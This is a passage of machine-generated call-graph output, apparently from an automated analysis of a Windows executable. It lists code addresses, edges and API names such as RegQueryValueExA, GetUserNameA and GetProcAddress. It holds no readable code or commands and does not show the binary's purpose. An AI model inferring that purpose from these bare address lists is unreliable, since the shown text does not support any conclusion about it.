57112->57113 57113->57040 57115 4497dc RegQueryValueExA 57114->57115 57116 4497d8 57114->57116 57115->57116 57117 4497fb 57115->57117 57116->57102 57117->57116 57118 44980d RegQueryValueExA 57117->57118 57118->57116 57119->57109 57120->57111 57122 449851 RegQueryValueExA 57121->57122 57123 40e8a4 57121->57123 57122->57123 57123->56655 57125 402320 57124->57125 57126 40230d 57124->57126 57128 40231d 57125->57128 57129 40233d 57125->57129 57135 44c558 38 API calls 6 library calls 57126->57135 57128->57125 57136 44c558 38 API calls 6 library calls 57128->57136 57130 437cca _wctomb_s 38 API calls 57129->57130 57133 40235d _wctomb_s 57130->57133 57132 40233a 57132->57129 57133->57058 57134->57058 57135->57128 57136->57132 57138 4497cc 2 API calls 57137->57138 57139 449898 57138->57139 57140 44983f RegQueryValueExA 57139->57140 57142 4498d4 57139->57142 57141 4498c1 57140->57141 57141->57142 57143 44983f RegQueryValueExA 57141->57143 57142->57075 57144 4498f0 57143->57144 57144->57142 57145 44983f RegQueryValueExA 57144->57145 57145->57142 57147 402748 57146->57147 57148 402772 57147->57148 57149 40275f 57147->57149 57151 40276f 57148->57151 57152 40278f 57148->57152 57157 44c558 38 API calls 6 library calls 57149->57157 57151->57148 57158 44c558 38 API calls 6 library calls 57151->57158 57155 401f16 38 API calls 57152->57155 57154 40278c 57154->57152 57156 4027a7 57155->57156 57156->57077 57157->57151 57158->57154 57159->57083 57160->57085 57161->57094 57162->57098 57903 407bbd 57163->57903 57165 4045d9 ___initmbctable 57909 407acb 57165->57909 57167 404604 57913 407ca8 57167->57913 57169 40461b 57920 407e9d 57169->57920 57171 40465b 57172 407e9d 13 API calls 57171->57172 57173 404695 57172->57173 57174 40b852 35 API calls 57173->57174 57175 4046b5 57174->57175 57923 407a30 57175->57923 57177 4046c5 57183 4048f7 57177->57183 57927 407c24 57177->57927 57180 407acb 13 API calls 57181 4046fc 57180->57181 57182 407ca8 41 API calls 57181->57182 57187 40470c 57182->57187 57184 407e9d 13 API calls 57183->57184 57188 4049ae 57184->57188 57185 4049e6 57186 407ca8 41 API calls 57185->57186 57189 404a00 57186->57189 57930 407d26 57187->57930 57188->57185 57192 407e9d 13 API calls 57188->57192 57191 407acb 13 API calls 57189->57191 57197 404a11 57191->57197 57192->57185 57193 404741 57194 407d26 13 API calls 57193->57194 57195 40477f 57194->57195 57196 407ca8 41 API calls 57195->57196 57198 404795 57196->57198 57199 407dcb 13 API calls 57197->57199 57204 4047a8 57198->57204 57207 404905 57198->57207 57200 404a68 57199->57200 57201 407a30 13 API calls 57200->57201 57202 404a79 57201->57202 57203 407acb 13 API calls 57202->57203 57214 404a89 57203->57214 57933 407dcb 57204->57933 57206 404803 57208 407acb 13 API calls 57206->57208 57209 407dcb 13 API calls 57207->57209 57210 40481c 57208->57210 57209->57183 57211 407ca8 41 API calls 57210->57211 57212 40482c 57211->57212 57213 410ce3 16 API calls 57212->57213 57216 404836 57213->57216 57215 407dcb 13 API calls 57214->57215 57218 404b20 57215->57218 57217 407d26 13 API calls 57216->57217 57219 40486b 57217->57219 57936 407fef 57218->57936 57220 407ca8 41 API calls 57219->57220 57221 40487c 57220->57221 57224 407ca8 41 API calls 57221->57224 57223 404b54 57939 40809a 57223->57939 57226 40488b 57224->57226 57227 407ee2 13 API calls 57226->57227 57228 4048b1 57227->57228 57228->57183 57230 407e9d 13 API calls 57228->57230 57229 404b69 57231 407dcb 13 API calls 57229->57231 57230->57183 57232 404bc0 57231->57232 57942 4080c2 57232->57942 57234 404bfd 57237 407a30 13 API calls 57234->57237 57235 407acb 13 API calls 57240 404c45 57235->57240 57236 404bed 57236->57234 57236->57235 57238 404cac 57237->57238 57239 407acb 13 API calls 57238->57239 57242 404cc1 57239->57242 57241 4080c2 13 API calls 57240->57241 57244 404c71 57241->57244 57243 4080c2 13 API calls 57242->57243 57246 404ced 57243->57246 57245 4080c2 13 API calls 57244->57245 57245->57234 57247 4080c2 13 API calls 57246->57247 57248 404d15 57247->57248 57249 4080c2 13 API calls 57248->57249 57250 404d3d 57249->57250 57251 4080c2 13 API calls 57250->57251 57252 404d68 57251->57252 57253 4080c2 13 API calls 57252->57253 57254 404d90 57253->57254 57255 4080c2 13 API calls 57254->57255 57256 404db8 57255->57256 57257 407d26 13 API calls 57256->57257 57258 404dee 57257->57258 57259 407acb 13 API calls 57258->57259 57260 404e03 57259->57260 57261 407dcb 13 API calls 57260->57261 57262 404e5f 57261->57262 57263 407dcb 13 API calls 57262->57263 57264 404eb7 57263->57264 57265 407acb 13 API calls 57264->57265 57266 404ecc 57265->57266 57945 407d77 57266->57945 57268 404f06 57269 407a30 13 API calls 57268->57269 57270 404f16 57269->57270 57271 407acb 13 API calls 57270->57271 57272 404f2b 57271->57272 57273 407dcb 13 API calls 57272->57273 57274 404f79 57273->57274 57275 407dcb 13 API calls 57274->57275 57276 404fc3 57275->57276 57277 407dcb 13 API calls 57276->57277 57278 405045 57277->57278 57279 407acb 13 API calls 57278->57279 57280 40505a 57279->57280 57281 407dcb 13 API calls 57280->57281 57282 4050a8 57281->57282 57283 407dcb 13 API calls 57282->57283 57284 4050ff 57283->57284 57285 407a30 13 API calls 57284->57285 57286 40510f 57285->57286 57287 407acb 13 API calls 57286->57287 57288 405127 57287->57288 57289 407dcb 13 API calls 57288->57289 57290 405182 57289->57290 57291 407acb 13 API calls 57290->57291 57292 405197 57291->57292 57293 4080c2 13 API calls 57292->57293 57294 4051c4 57293->57294 57295 407d26 13 API calls 57294->57295 57296 4051fb 57295->57296 57297 407d26 13 API calls 57296->57297 57298 405235 57297->57298 57299 40809a 13 API calls 57298->57299 57300 40524e 57299->57300 57301 407d26 13 API calls 57300->57301 57302 405288 57301->57302 57303 407a30 13 API calls 57302->57303 57304 405298 57303->57304 57305 407acb 13 API calls 57304->57305 57306 4052a9 57305->57306 57307 4080c2 13 API calls 57306->57307 57308 4052d5 57307->57308 57309 4080c2 13 API calls 57308->57309 57310 4052fd 57309->57310 57311 4080c2 13 API calls 57310->57311 57312 405325 57311->57312 57313 4080c2 13 API calls 57312->57313 57314 40534d 57313->57314 57315 4080c2 13 API calls 57314->57315 57316 405375 57315->57316 57317 4080c2 13 API calls 57316->57317 57318 40539d 57317->57318 57319 407dcb 13 API calls 57318->57319 57320 4053f5 57319->57320 57321 4080c2 13 API calls 57320->57321 57322 40541d 57321->57322 57323 4080c2 13 API calls 57322->57323 57324 405445 57323->57324 57325 4080c2 13 API calls 57324->57325 57326 40546d 57325->57326 57327 4080c2 13 API calls 57326->57327 57328 405495 57327->57328 57329 40b852 35 API calls 57328->57329 57330 4054a5 57329->57330 57331 407a30 13 API calls 57330->57331 57332 4054b5 57331->57332 57333 407acb 13 API calls 57332->57333 57334 4054d3 57333->57334 57335 407ca8 41 API calls 57334->57335 57336 4054e6 57335->57336 57337 407d26 13 API calls 57336->57337 57338 40551d 57337->57338 57339 407d26 13 API calls 57338->57339 57340 405557 57339->57340 57341 407ca8 41 API calls 57340->57341 57342 405566 57341->57342 57343 407acb 13 API calls 57342->57343 57344 40557b 57343->57344 57345 407d26 13 API calls 57344->57345 57346 4055b6 57345->57346 57347 4080c2 13 API calls 57346->57347 57348 4055de 57347->57348 57349 4080c2 13 API calls 57348->57349 57350 405606 57349->57350 57351 4080c2 13 API calls 57350->57351 57352 40562e 57351->57352 57353 4080c2 13 API calls 57352->57353 57354 405656 57353->57354 57355 40b852 35 API calls 57354->57355 57356 405666 57355->57356 57357 407a30 13 API calls 57356->57357 57358 405676 57357->57358 57359 407acb 13 API calls 57358->57359 57360 405694 57359->57360 57361 407dcb 13 API calls 57360->57361 57362 4056f5 57361->57362 57363 4080c2 13 API calls 57362->57363 57364 40571d 57363->57364 57365 407acb 13 API calls 57364->57365 57366 405732 57365->57366 57948 408041 57366->57948 57368 405762 57369 407acb 13 API calls 57368->57369 57370 405777 57369->57370 57371 4080c2 13 API calls 57370->57371 57372 4057a3 57371->57372 57373 407acb 13 API calls 57372->57373 57374 4057b8 57373->57374 57375 407d26 13 API calls 57374->57375 57376 4057f3 57375->57376 57377 40b852 35 API calls 57376->57377 57378 405803 57377->57378 57379 407a30 13 API calls 57378->57379 57380 405813 57379->57380 57381 407acb 13 API calls 57380->57381 57382 405831 57381->57382 57383 407d26 13 API calls 57382->57383 57384 40586c 57383->57384 57385 4080c2 13 API calls 57384->57385 57386 405897 57385->57386 57387 407acb 13 API calls 57386->57387 57388 4058a8 57387->57388 57389 4080c2 13 API calls 57388->57389 57390 4058d4 57389->57390 57391 407a30 13 API calls 57390->57391 57392 4058e4 57391->57392 57393 407acb 13 API calls 57392->57393 57394 4058f9 57393->57394 57395 407d77 13 API calls 57394->57395 57396 405932 57395->57396 57397 407acb 13 API calls 57396->57397 57398 405943 57397->57398 57399 4080c2 13 API calls 57398->57399 57400 405972 57399->57400 57401 40b852 35 API calls 57400->57401 57402 405982 57401->57402 57403 407acb 13 API calls 57402->57403 57404 405997 57403->57404 57405 407dcb 13 API calls 57404->57405 57406 4059f5 57405->57406 57407 4080c2 13 API calls 57406->57407 57408 405a20 57407->57408 57409 407a30 13 API calls 57408->57409 57410 405a30 57409->57410 57411 407acb 13 API calls 57410->57411 57412 405a45 57411->57412 57413 4080c2 13 API calls 57412->57413 57414 405a74 57413->57414 57415 407dcb 13 API calls 57414->57415 57416 405ac4 57415->57416 57417 407acb 13 API calls 57416->57417 57418 405ad9 57417->57418 57419 407c24 13 API calls 57418->57419 57420 405ae8 57419->57420 57951 407ee2 57420->57951 57422 405b17 57423 407ca8 41 API calls 57422->57423 57424 405b76 57423->57424 57425 407d26 13 API calls 57424->57425 57426 405bae 57425->57426 57427 407e9d 13 API calls 57426->57427 57428 405be3 57427->57428 57429 407ca8 41 API calls 57428->57429 57430 405bf9 57429->57430 57431 407a30 13 API calls 57430->57431 57432 405c09 57431->57432 57433 407acb 13 API calls 57432->57433 57434 405c1e 57433->57434 57435 4080c2 13 API calls 57434->57435 57436 405c4b 57435->57436 57437 4080c2 13 API calls 57436->57437 57438 405c76 57437->57438 57439 407dcb 13 API calls 57438->57439 57440 405cd2 57439->57440 57441 40b852 35 API calls 57440->57441 57442 405ce2 57441->57442 57443 407acb 13 API calls 57442->57443 57444 405cfa 57443->57444 57445 40809a 13 API calls 57444->57445 57446 405d20 57445->57446 57447 407ca8 41 API calls 57446->57447 57448 405d2f 57447->57448 57449 407c24 13 API calls 57448->57449 57450 405d37 57449->57450 57451 407ee2 13 API calls 57450->57451 57452 405d66 57451->57452 57453 40809a 13 API calls 57452->57453 57454 405d91 57453->57454 57455 407d26 13 API calls 57454->57455 57456 405dcc 57455->57456 57457 407d26 13 API calls 57456->57457 57458 405e0e 57457->57458 57459 407d26 13 API calls 57458->57459 57460 405e50 57459->57460 57461 407e9d 13 API calls 57460->57461 57462 405e85 57461->57462 57463 407ca8 41 API calls 57462->57463 57464 405e9b 57463->57464 57465 407a30 13 API calls 57464->57465 57720 406316 57464->57720 57467 405eb8 57465->57467 57466 4065e8 57468 406712 57466->57468 57471 407a30 13 API calls 57466->57471 57470 407acb 13 API calls 57467->57470 57474 407a30 13 API calls 57468->57474 57479 40677a 57468->57479 57469 407a30 13 API calls 57472 406375 57469->57472 57483 405ecd 57470->57483 57475 406607 57471->57475 57473 407acb 13 API calls 57472->57473 57505 406386 57473->57505 57476 40672b 57474->57476 57477 407acb 13 API calls 57475->57477 57480 407acb 13 API calls 57476->57480 57499 40661c 57477->57499 57478 407610 57478->56474 57479->57478 57481 407a30 13 API calls 57479->57481 57496 406740 57480->57496 57482 4067ae 57481->57482 57484 4067f3 57482->57484 57485 4067b7 57482->57485 57487 407d26 13 API calls 57483->57487 57490 407acb 13 API calls 57484->57490 57488 4067c1 57485->57488 57489 406883 57485->57489 57486 4066c1 57494 4080c2 13 API calls 57486->57494 57491 405f08 57487->57491 57493 407acb 13 API calls 57488->57493 57492 407acb 13 API calls 57489->57492 57506 406808 57490->57506 57491->57466 57497 407acb 13 API calls 57491->57497 57500 40689b 57492->57500 57495 4067d2 57493->57495 57503 4066ea 57494->57503 57502 40809a 13 API calls 57495->57502 57498 407d26 13 API calls 57496->57498 57507 405f2a 57497->57507 57498->57479 57499->57486 57501 407dcb 13 API calls 57499->57501 57508 4080c2 13 API calls 57500->57508 57526 406677 57501->57526 57504 4067eb 57502->57504 57509 4080c2 13 API calls 57503->57509 57511 40695a 57504->57511 57515 407acb 13 API calls 57504->57515 57512 407dcb 13 API calls 57505->57512 57510 407d26 13 API calls 57506->57510 57514 4080c2 13 API calls 57507->57514 57508->57504 57509->57468 57513 406842 57510->57513 57516 406ae4 57511->57516 57520 407acb 13 API calls 57511->57520 57517 4063fe 57512->57517 57518 407acb 13 API calls 57513->57518 57529 405f56 57514->57529 57545 4068e9 57515->57545 57519 407120 57516->57519 57523 407a30 13 API calls 57516->57523 57521 407ca8 41 API calls 57517->57521 57531 406857 57518->57531 57522 407a30 13 API calls 57519->57522 57530 40697e 57520->57530 57540 40640d 57521->57540 57525 407133 57522->57525 57524 406b01 57523->57524 57527 407acb 13 API calls 57524->57527 57528 407acb 13 API calls 57525->57528 57533 407dcb 13 API calls 57526->57533 57538 406b12 57527->57538 57539 407148 57528->57539 57532 4080c2 13 API calls 57529->57532 57968 407f91 13 API calls 57530->57968 57536 4080c2 13 API calls 57531->57536 57534 405f7e 57532->57534 57533->57486 57537 407acb 13 API calls 57534->57537 57536->57489 57560 405f93 57537->57560 57541 4080c2 13 API calls 57538->57541 57543 4080c2 13 API calls 57539->57543 57542 407d26 13 API calls 57540->57542 57548 406b3e 57541->57548 57554 406444 57542->57554 57550 407177 57543->57550 57544 4069ad 57546 4080c2 13 API calls 57544->57546 57547 407dcb 13 API calls 57545->57547 57549 4069dc 57546->57549 57547->57511 57552 4080c2 13 API calls 57548->57552 57549->57516 57553 407a30 13 API calls 57549->57553 57551 4080c2 13 API calls 57550->57551 57555 4071a3 57551->57555 57556 406b66 57552->57556 57557 4069f9 57553->57557 57558 407d26 13 API calls 57554->57558 57559 407ca8 41 API calls 57555->57559 57561 407acb 13 API calls 57556->57561 57562 407acb 13 API calls 57557->57562 57563 40647e 57558->57563 57564 4071b1 57559->57564 57566 407dcb 13 API calls 57560->57566 57567 406b7b 57561->57567 57568 406a0e 57562->57568 57565 407ca8 41 API calls 57563->57565 57569 40809a 13 API calls 57564->57569 57578 40648d 57565->57578 57571 405ff0 57566->57571 57572 4080c2 13 API calls 57567->57572 57969 407f91 13 API calls 57568->57969 57570 4071c7 57569->57570 57574 407c24 13 API calls 57570->57574 57575 407acb 13 API calls 57571->57575 57579 406ba7 57572->57579 57581 4071d6 57574->57581 57585 406023 57575->57585 57576 406a3d 57577 407acb 13 API calls 57576->57577 57587 406a59 57577->57587 57580 407d26 13 API calls 57578->57580 57582 4080c2 13 API calls 57579->57582 57584 4064c3 57580->57584 57583 407e9d 13 API calls 57581->57583 57591 406bcf 57582->57591 57589 407204 57583->57589 57588 4080c2 13 API calls 57584->57588 57586 407d26 13 API calls 57585->57586 57590 40605c 57586->57590 57592 407d26 13 API calls 57587->57592 57609 4064eb 57588->57609 57595 407ee2 13 API calls 57589->57595 57593 407a30 13 API calls 57590->57593 57594 4080c2 13 API calls 57591->57594 57602 406a94 57592->57602 57596 40606c 57593->57596 57598 406bf7 57594->57598 57599 40723a 57595->57599 57597 407acb 13 API calls 57596->57597 57607 406081 57597->57607 57600 407acb 13 API calls 57598->57600 57601 40807b 13 API calls 57599->57601 57604 406c0c 57600->57604 57603 407280 57601->57603 57605 407d26 13 API calls 57602->57605 57610 40809a 13 API calls 57603->57610 57608 4080c2 13 API calls 57604->57608 57606 406acb 57605->57606 57613 40809a 13 API calls 57606->57613 57611 407d26 13 API calls 57607->57611 57618 406c38 57608->57618 57614 407dcb 13 API calls 57609->57614 57616 407299 57610->57616 57612 4060bb 57611->57612 57954 44675d 57612->57954 57613->57516 57622 406543 57614->57622 57619 407e9d 13 API calls 57616->57619 57617 4060c3 57620 40b852 35 API calls 57617->57620 57621 4080c2 13 API calls 57618->57621 57627 4072c4 57619->57627 57631 4060db 57620->57631 57623 406c5f 57621->57623 57624 407d26 13 API calls 57622->57624 57625 407fef 13 API calls 57623->57625 57633 406579 57624->57633 57626 406c96 57625->57626 57628 407a30 13 API calls 57626->57628 57629 407d26 13 API calls 57627->57629 57630 406ca6 57628->57630 57638 407307 57629->57638 57632 407acb 13 API calls 57630->57632 57634 407dcb 13 API calls 57631->57634 57637 406cb7 57632->57637 57635 407d26 13 API calls 57633->57635 57636 406131 57634->57636 57642 4065af 57635->57642 57640 407acb 13 API calls 57636->57640 57641 4080c2 13 API calls 57637->57641 57639 407d26 13 API calls 57638->57639 57652 407342 57639->57652 57646 40614f 57640->57646 57643 406ce4 57641->57643 57644 407d26 13 API calls 57642->57644 57645 4080c2 13 API calls 57643->57645 57644->57466 57651 406d0c 57645->57651 57647 407d26 13 API calls 57646->57647 57657 40618a 57647->57657 57648 406d80 57649 407a30 13 API calls 57648->57649 57650 406d93 57649->57650 57653 407acb 13 API calls 57650->57653 57651->57648 57970 407f91 13 API calls 57651->57970 57654 407dcb 13 API calls 57652->57654 57656 406da4 57653->57656 57673 40739c 57654->57673 57660 4080c2 13 API calls 57656->57660 57658 407d26 13 API calls 57657->57658 57661 4061c0 57658->57661 57659 406d40 57665 407fef 13 API calls 57659->57665 57663 406dd0 57660->57663 57662 407acb 13 API calls 57661->57662 57664 4061d5 57662->57664 57666 407acb 13 API calls 57663->57666 57668 407ca8 41 API calls 57664->57668 57665->57648 57667 406de5 57666->57667 57669 407c24 13 API calls 57667->57669 57670 4061e5 57668->57670 57671 406df1 57669->57671 57672 407c24 13 API calls 57670->57672 57674 407ca8 41 API calls 57671->57674 57682 4061f0 57672->57682 57676 407dcb 13 API calls 57673->57676 57675 406e04 57674->57675 57679 40809a 13 API calls 57675->57679 57677 4073f7 57676->57677 57678 40807b 13 API calls 57677->57678 57680 407405 57678->57680 57686 406e20 57679->57686 57681 407ca8 41 API calls 57680->57681 57683 407414 57681->57683 57684 407d26 13 API calls 57682->57684 57683->57478 57685 407a30 13 API calls 57683->57685 57692 40622c 57684->57692 57687 407432 57685->57687 57689 407e9d 13 API calls 57686->57689 57688 407acb 13 API calls 57687->57688 57693 407443 57688->57693 57690 406e51 57689->57690 57691 407ca8 41 API calls 57690->57691 57695 406e6d 57691->57695 57694 407d26 13 API calls 57692->57694 57696 407f3c 13 API calls 57693->57696 57699 40626d 57694->57699 57697 407ee2 13 API calls 57695->57697 57700 407476 57696->57700 57698 406e96 57697->57698 57962 40807b 57698->57962 57701 407e9d 13 API calls 57699->57701 57703 407f3c 13 API calls 57700->57703 57706 4062a2 57701->57706 57707 40749f 57703->57707 57705 407ca8 41 API calls 57711 406ef7 57705->57711 57708 407e9d 13 API calls 57706->57708 57710 407f3c 13 API calls 57707->57710 57709 4062d7 57708->57709 57712 407ca8 41 API calls 57709->57712 57714 4074c8 57710->57714 57965 407f3c 57711->57965 57715 4062ed 57712->57715 57717 407f3c 13 API calls 57714->57717 57718 407ee2 13 API calls 57715->57718 57716 406f27 57719 407e9d 13 API calls 57716->57719 57723 4074f1 57717->57723 57718->57720 57721 406f5b 57719->57721 57720->57466 57720->57469 57722 407ca8 41 API calls 57721->57722 57724 406f77 57722->57724 57725 407f3c 13 API calls 57723->57725 57726 407ca8 41 API calls 57724->57726 57728 40751a 57725->57728 57727 406f88 57726->57727 57729 40809a 13 API calls 57727->57729 57730 407f3c 13 API calls 57728->57730 57732 406fa1 57729->57732 57731 407543 57730->57731 57733 407f3c 13 API calls 57731->57733 57734 407dcb 13 API calls 57732->57734 57735 40756c 57733->57735 57737 406fed 57734->57737 57736 407f3c 13 API calls 57735->57736 57739 407595 57736->57739 57738 407d26 13 API calls 57737->57738 57740 40702a 57738->57740 57742 407f3c 13 API calls 57739->57742 57741 40807b 13 API calls 57740->57741 57743 407044 57741->57743 57747 4075be 57742->57747 57744 407a30 13 API calls 57743->57744 57745 407054 57744->57745 57746 407acb 13 API calls 57745->57746 57749 407069 57746->57749 57748 407f3c 13 API calls 57747->57748 57750 4075e7 57748->57750 57751 4080c2 13 API calls 57749->57751 57752 407f3c 13 API calls 57750->57752 57753 407099 57751->57753 57752->57478 57754 407d26 13 API calls 57753->57754 57755 4070d2 57754->57755 57756 407dcb 13 API calls 57755->57756 57756->57519 57758 438717 57757->57758 57759 43877f 57757->57759 57760 407acb 13 API calls 57758->57760 57761 407acb 13 API calls 57759->57761 57762 438725 57760->57762 57763 43879f 57761->57763 57764 407e9d 13 API calls 57762->57764 57765 4080c2 13 API calls 57763->57765 57767 43874e 57764->57767 57768 4387cb __shift 57765->57768 57766 407acb 13 API calls 57770 438847 57766->57770 57767->57759 57769 407e9d 13 API calls 57767->57769 57768->57766 57769->57759 57771 4080c2 13 API calls 57770->57771 57772 43886e 57771->57772 57773 4080c2 13 API calls 57772->57773 57774 438893 57773->57774 57775 407acb 13 API calls 57774->57775 57776 4388a8 57775->57776 57777 4388db 57776->57777 57778 4388e5 57776->57778 57779 4388fc 57776->57779 57781 407fef 13 API calls 57777->57781 58000 44c558 38 API calls 6 library calls 57778->58000 57780 40b40a 13 API calls 57779->57780 57784 43890e 57780->57784 57787 4389cf 57781->57787 57783 4388f9 57783->57779 57785 40b40a 13 API calls 57784->57785 57786 438946 57785->57786 57786->57777 57790 40b40a 13 API calls 57786->57790 57788 407dcb 13 API calls 57787->57788 57789 438a24 57788->57789 57791 407acb 13 API calls 57789->57791 57790->57777 57792 438a3a 57791->57792 57793 4080c2 13 API calls 57792->57793 57794 438a67 57793->57794 57795 407acb 13 API calls 57794->57795 57796 438a78 57795->57796 57797 4080c2 13 API calls 57796->57797 57798 438aa9 57797->57798 57799 407dcb 13 API calls 57798->57799 57800 438b0a 57799->57800 57801 407acb 13 API calls 57800->57801 57802 438b1d 57801->57802 57803 4080c2 13 API calls 57802->57803 57804 438b4d 57803->57804 57805 407acb 13 API calls 57804->57805 57806 438b5e 57805->57806 57807 40809a 13 API calls 57806->57807 57808 438b7b 57807->57808 57809 40b852 35 API calls 57808->57809 57810 438b8b 57809->57810 57811 407acb 13 API calls 57810->57811 57813 438b9f 57811->57813 57812 407acb 13 API calls 57817 438cfc 57812->57817 57814 438bf6 57813->57814 57815 438bdf 57813->57815 57830 438bd5 57813->57830 57818 40b40a 13 API calls 57814->57818 58001 44c558 38 API calls 6 library calls 57815->58001 57820 4080c2 13 API calls 57817->57820 57823 438c08 57818->57823 57819 438bf3 57819->57814 57821 438d2b 57820->57821 57822 407acb 13 API calls 57821->57822 57825 438d3c 57822->57825 57824 40b40a 13 API calls 57823->57824 57826 438c54 57824->57826 57827 407dcb 13 API calls 57825->57827 57828 40b40a 13 API calls 57826->57828 57826->57830 57829 438d95 __shift 57827->57829 57828->57830 57831 407acb 13 API calls 57829->57831 57830->57812 57830->57830 57832 438dd6 57831->57832 57833 4080c2 13 API calls 57832->57833 57834 438e00 57833->57834 57835 4080c2 13 API calls 57834->57835 57836 438e28 57835->57836 57837 407acb 13 API calls 57836->57837 57838 438e3d 57837->57838 57839 407dcb 13 API calls 57838->57839 57840 438ea1 57839->57840 57841 407acb 13 API calls 57840->57841 57842 438eb3 57841->57842 57843 4080c2 13 API calls 57842->57843 57844 438edb 57843->57844 57845 4080c2 13 API calls 57844->57845 57846 438f00 57845->57846 57847 4080c2 13 API calls 57846->57847 57848 438f25 57847->57848 57849 4080c2 13 API calls 57848->57849 57850 438f4a 57849->57850 57851 4080c2 13 API calls 57850->57851 57852 438f6f 57851->57852 57853 407acb 13 API calls 57852->57853 57870 439044 57852->57870 57856 438f8f 57853->57856 57855 4390f8 57855->56476 57858 438fb9 57856->57858 57860 438fc0 57856->57860 57861 438fd7 57856->57861 57857 439095 57857->57855 57859 407acb 13 API calls 57857->57859 57863 43904f 57858->57863 57858->57870 57869 4390c1 57859->57869 58002 44c558 38 API calls 6 library calls 57860->58002 57864 40b40a 13 API calls 57861->57864 58003 44c558 38 API calls 6 library calls 57863->58003 57867 438fe8 57864->57867 57865 438fd4 57865->57861 57872 40b40a 13 API calls 57867->57872 57868 439063 57868->57870 57871 407fef 13 API calls 57869->57871 57870->57857 57976 40e4fb 57870->57976 57871->57855 57872->57858 57874 43b8f2 57873->57874 57875 43b8db 57873->57875 57874->56479 58004 44c558 38 API calls 6 library calls 57875->58004 57877 43b8ef 57877->57874 57879 402036 38 API calls 57878->57879 57880 43b7a4 57879->57880 58005 40240c 57880->58005 57884 43b7f8 SelectObject 57885 43b815 57884->57885 57886 43b806 GetTextMetricsA 57884->57886 57887 43b824 ReleaseDC 57885->57887 57888 43b82c 57885->57888 57886->57885 57887->57888 57889 43b831 DeleteObject 57888->57889 57890 43b83a 57888->57890 57889->57890 57891 43c6eb LoadCursorA RegisterClassA CreateDialogParamA SetWindowLongA SetWindowLongA 57890->57891 57892 43c79e KiUserCallbackDispatcher 57891->57892 57893 43c76e GetWindowLongA 57892->57893 57894 43c7ae 57892->57894 57897 43c780 IsDialogMessageA 57893->57897 57904 407bca 57903->57904 57905 407bfb 57904->57905 57906 40b40a 13 API calls 57904->57906 57905->57165 57907 407beb 57906->57907 57908 40b40a 13 API calls 57907->57908 57908->57905 57910 407adf _wctomb_s 57909->57910 57911 40b40a 13 API calls 57910->57911 57912 407b81 __shift 57910->57912 57911->57912 57912->57167 57971 407c3a 57913->57971 57916 407cd1 57975 44c558 38 API calls 6 library calls 57916->57975 57918 407ce5 57919 407ce8 57918->57919 57919->57169 57921 407c3a 13 API calls 57920->57921 57922 407eb4 57921->57922 57922->57171 57924 407a3f 57923->57924 57925 407a94 __shift 57924->57925 57926 40b40a 13 API calls 57924->57926 57925->57177 57926->57925 57928 407bbd 13 API calls 57927->57928 57929 4046e3 57928->57929 57929->57180 57931 407c3a 13 API calls 57930->57931 57932 407d3d 57931->57932 57932->57193 57934 407c3a 13 API calls 57933->57934 57935 407de3 57934->57935 57935->57206 57937 407c3a 13 API calls 57936->57937 57938 408006 57937->57938 57938->57223 57940 407c3a 13 API calls 57939->57940 57941 4080ad 57940->57941 57941->57229 57943 407c3a 13 API calls 57942->57943 57944 4080d9 57943->57944 57944->57236 57946 407c3a 13 API calls 57945->57946 57947 407d8e 57946->57947 57947->57268 57949 407c3a 13 API calls 57948->57949 57950 408058 57949->57950 57950->57368 57952 407c3a 13 API calls 57951->57952 57953 407efa 57952->57953 57953->57422 57955 44676e 57954->57955 57958 446790 57954->57958 57955->57958 57959 44677d GetProcAddress 57955->57959 57956 4467f4 GetUserNameA 57957 446808 57956->57957 57960 446819 GetUserNameA 57957->57960 57958->57956 57961 44682a 57958->57961 57959->57958 57960->57961 57961->57617 57963 407c3a 13 API calls 57962->57963 57964 406ee8 57963->57964 57964->57705 57966 407c3a 13 API calls 57965->57966 57967 407f54 57966->57967 57967->57716 57968->57544 57969->57576 57970->57659 57972 407c44 57971->57972 57973 407c61 57972->57973 57974 40b40a 13 API calls 57972->57974 57973->57916 57973->57919 57974->57973 57975->57918 57977 40e50c 57976->57977 57978 40e5be 57976->57978 57979 407acb 13 API calls 57977->57979 57980 407a30 13 API calls 57978->57980 57987 40e523 57979->57987 57981 40e5d1 57980->57981 57982 40e629 57981->57982 57984 407acb 13 API calls 57981->57984 57983 407acb 13 API calls 57982->57983 57986 40e63f 57983->57986 57988 40e5f5 57984->57988 57985 40b40a 13 API calls 57985->57987 57989 407d26 13 API calls 57986->57989 57987->57978 57987->57985 57990 407d26 13 API calls 57988->57990 57991 40e670 57989->57991 57990->57982 57992 407d26 13 API calls 57991->57992 57993 40e69f 57992->57993 57994 407d26 13 API calls 57993->57994 57995 40e6ce 57994->57995 57996 407f3c 13 API calls 57995->57996 57997 40e6f9 57996->57997 57998 407f3c 13 API calls 57997->57998 57999 40e724 57998->57999 57999->57857 58000->57783 58001->57819 58002->57865 58003->57868 58004->57877 58006 402425 58005->58006 58007 402438 58005->58007 58019 44c558 38 API calls 6 library calls 58006->58019 58008 402435 58007->58008 58009 402455 58007->58009 58008->58007 58020 44c558 38 API calls 6 library calls 58008->58020 58012 437de8 38 API calls 58009->58012 58014 402468 58012->58014 58013 402452 58013->58009 58015 402471 58014->58015 58016 402484 CreateFontA GetDC 58014->58016 58021 44c558 38 API calls 6 library calls 58015->58021 58016->57884 58016->57885 58018 402481 58018->58016 58019->58008 58020->58013 58021->58018 58030 452687 ___initmbctable _wctomb_s 58022->58030 58023 45346f 58024 4534ac 58023->58024 58042 44e3a9 HeapFree VirtualFree VirtualFree HeapFree _wctomb_s 58023->58042 58027 44fbf6 ___initmbctable 13 API calls 58024->58027 58026 44d22d 37 API calls ___initmbctable 58026->58030 58028 4534d9 _wctomb_s 58027->58028 58028->56501 58029 452c99 58029->58023 58041 44ed5d 6 API calls __getbuf 58029->58041 58030->58023 58030->58026 58030->58029 58032 45344c 58030->58032 58034 452662 12 API calls 58030->58034 58035 455db3 37 API calls 58030->58035 58036 452630 37 API calls 58030->58036 58038 44ed5d 6 API calls 58030->58038 58039 455ddc MultiByteToWideChar MultiByteToWideChar 58030->58039 58032->58029 58040 44ed5d 6 API calls __getbuf 58032->58040 58034->58030 58035->58030 58036->58030 58038->58030 58039->58030 58040->58029 58041->58023 58042->58024 58044 449aa1 58043->58044 58044->56522 58045->56529 58046->56528 55779 4468f2 55780 446927 GetProcAddress 55779->55780 55781 446903 55779->55781 55782 4469a3 55780->55782 55783 44693c 55780->55783 55781->55780 55786 446917 55781->55786 55788 4469b7 GetProcAddress 55782->55788 55789 44699b 55782->55789 55784 446955 55783->55784 55785 446945 GetProcAddress 55783->55785 55790 446973 55784->55790 55791 44695f GetProcAddress 55784->55791 55785->55784 55865 441074 92 API calls _wctomb_s 55786->55865 55793 